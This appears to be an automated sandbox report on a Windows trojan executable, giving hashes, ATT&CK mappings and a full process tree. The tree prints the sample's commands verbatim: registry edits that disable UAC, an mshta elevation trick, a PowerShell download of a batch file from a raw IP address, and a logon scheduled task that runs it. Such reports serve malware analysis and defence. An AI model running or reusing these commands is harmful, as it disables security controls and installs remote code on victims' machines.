2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
150s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
25-06-2024 04:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	2068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2068	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
432	attrib.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3444	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
248	schtasks.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2068	powershell.exe
2068	powershell.exe
2996	msedge.exe
2996	msedge.exe
4444	msedge.exe
4444	msedge.exe
1016	msedge.exe
1016	msedge.exe
2408	identity_helper.exe
2408	identity_helper.exe
4012	msedge.exe
4012	msedge.exe
4012	msedge.exe
4012	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe
4444	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 900 wrote to memory of 4780	900	2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe	78
PID 900 wrote to memory of 4780	900	2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe	78
PID 4780 wrote to memory of 3444	4780	cmd.exe	82
PID 4780 wrote to memory of 3444	4780	cmd.exe	82
PID 3444 wrote to memory of 3776	3444	mshta.exe	83
PID 3444 wrote to memory of 3776	3444	mshta.exe	83
PID 3444 wrote to memory of 3776	3444	mshta.exe	83
PID 3776 wrote to memory of 5064	3776	203120~1.EXE	84
PID 3776 wrote to memory of 5064	3776	203120~1.EXE	84
PID 5064 wrote to memory of 2144	5064	cmd.exe	86
PID 5064 wrote to memory of 2144	5064	cmd.exe	86
PID 5064 wrote to memory of 1180	5064	cmd.exe	87
PID 5064 wrote to memory of 1180	5064	cmd.exe	87
PID 5064 wrote to memory of 2300	5064	cmd.exe	88
PID 5064 wrote to memory of 2300	5064	cmd.exe	88
PID 5064 wrote to memory of 4984	5064	cmd.exe	89
PID 5064 wrote to memory of 4984	5064	cmd.exe	89
PID 4984 wrote to memory of 2940	4984	cmd.exe	90
PID 4984 wrote to memory of 2940	4984	cmd.exe	90
PID 5064 wrote to memory of 4444	5064	cmd.exe	91
PID 5064 wrote to memory of 4444	5064	cmd.exe	91
PID 5064 wrote to memory of 432	5064	cmd.exe	92
PID 5064 wrote to memory of 432	5064	cmd.exe	92
PID 4444 wrote to memory of 2508	4444	msedge.exe	93
PID 4444 wrote to memory of 2508	4444	msedge.exe	93
PID 5064 wrote to memory of 2068	5064	cmd.exe	94
PID 5064 wrote to memory of 2068	5064	cmd.exe	94
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95
PID 4444 wrote to memory of 1620	4444	msedge.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
432	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe
"C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:900
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\79D3.tmp\79D4.tmp\79D5.bat C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\203120~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\203120~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\203120~1.EXE" goto :target
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C44.tmp\7C45.tmp\7C46.bat C:\Users\Admin\AppData\Local\Temp\203120~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5064
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2144
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:1180
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4984
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:2940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a1a03cb8,0x7ff8a1a03cc8,0x7ff8a1a03cd8
        7⤵
        
        PID:2508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
        7⤵
        
        PID:1620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
        7⤵
        
        PID:4588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
        7⤵
        
        PID:4692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
        7⤵
        
        PID:4468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
        7⤵
        
        PID:4116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        7⤵
        
        PID:4832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
        7⤵
        
        PID:1516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
        7⤵
        
        PID:644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,17498894615210037213,4493499837133524905,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4012
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:432
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c1c7e2f451eb3836d23007799bc21d5f

SHA1
11a25f6055210aa7f99d77346b0d4f1dc123ce79

SHA256
429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800

SHA512
2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6876cbd342d4d6b236f44f52c50f780f

SHA1
a215cf6a499bfb67a3266d211844ec4c82128d83

SHA256
ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e

SHA512
dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
2191df5434d202fe41a15570e257e52d

SHA1
6886f33652f24678d8a00488c445e85ed4a4915d

SHA256
4b242514929fcc8e40ec5de1fee71ba3f62abfbfb74c3426911cef33eb7f20c7

SHA512
e672b71155beeb7897fd34d792a53a85ee965f5cb8adaf800ad38e0e8409c170bb1381e12699763e41df5a49e347b2d0104e03ed81a708d383970ecc5bc1e733

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
40a99d9d32ff1a47a1b5816723ccb510

SHA1
c0d681e25c7fb73f331bd76bbe8bcdab59824d0f

SHA256
4b531ba9a8aec5a985cc34b0e0c89e524816f9154c15c402d72a6065e6ebf2be

SHA512
0b7b48a2adfa1d4654ad40046bcfb302bedc9782eaeb62f90937f1bec489d30e24211841ee25435d09194d7c2c6a3fb1090003b4b1065260765290e7330097b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c3107c17501046aed5e60881028a7924

SHA1
419f7d57b2edad158649a074eeeaf0d38dba2f40

SHA256
b1e8061f868f60eb05ef14b47de0bb5bbe962313f4a310c80a578fe96629f774

SHA512
ec8713ab130f1caeb2295d0d55901a3a19226d5072bf424e2cc568bec7666d99f9a815eabb7871818dd2a9a53292e361b8304746ef84c671e5b32acf41d731c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b55788e586638439ef67193dc84211a3

SHA1
ab8c480a65e3c5bebabe1185b144b6a32628fc41

SHA256
1c50f8721c610d879f14183ce9ce2b2aed27420db566ab01c8223448abec9cc3

SHA512
5ecb789fda5d36a8a84bdb7bb0ed89edcbe6956e0a26f7445e2b7ca9ca6b9e6b8784baf7bfe081803d32a1aaf8dcab6a8f62098c0bb04690209a9dae7d92abac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
46033ff56c3b3e6b116fd8f9b64c5000

SHA1
01dce5ccc67f94566b43973c61c425000f8995d7

SHA256
00504bea2a67ff4c6c794cfcd1f139d4ebfb4f945c9761c79c95013917569402

SHA512
a390f77f5ac8cb59997c49a9064d55b979a63579e74c05a94f7658b614ead76d023cf4cfc84c0e7ff91dca23290d1008f61a08766d7ed1321e09fb80a5f7c1d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d810.TMP

Filesize
48B

MD5
9f8ecc7452105c258c659ff7ba35ad67

SHA1
de2866f5c24a88323d7603a32255210a2a22e77f

SHA256
51b361ee5613d9c2e78744c26d0fee6e9c98d8844bb3062aec07cc23c42dc001

SHA512
2af004992e80f5aedd16a35fa2427b352a862f25ceaffed36b7795068e011a2b9a4c71c26d518d7d7e4cf1ee83917016b90e74018298ec04ee63b5985420bd14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
107fec19fa035123ac10aa30dfc5ebe3

SHA1
e4f8f28255c89d08fed0b7c138ef71b3ecf3dcbd

SHA256
1a7f5b754b2af79e6f731d6ba183c1185416e61df756a592caf7c7f5618cb1d6

SHA512
4b00564d5ec06e686d458cd52054118dfc0a01f524bf645ac32f8c4c02c72099d6d2c66eeef9860d87d61100a48bd4b523f658f5a6914e395be4f5e62d040370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6ef864b5839d54fc6be9346c3de4af07

SHA1
4e98411351f6e6dc391b61ddf278b41a6739dd86

SHA256
9fc6ea22fa17d0fe49dcea60770e322cb9ca07361c4eac718bfb489a7f995bf0

SHA512
9209565af669841a03cdbaeacd5b7545abdfefe522cce0d39282d322b2f434ff52b33cac7b1a27ddb725f6c063b5342f86cf40706dce45472919075aad5509a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\79D3.tmp\79D4.tmp\79D5.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3l3cbnns.qrk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2068-9-0x000001CE3BA20000-0x000001CE3BA42000-memory.dmp

Filesize
136KB

Download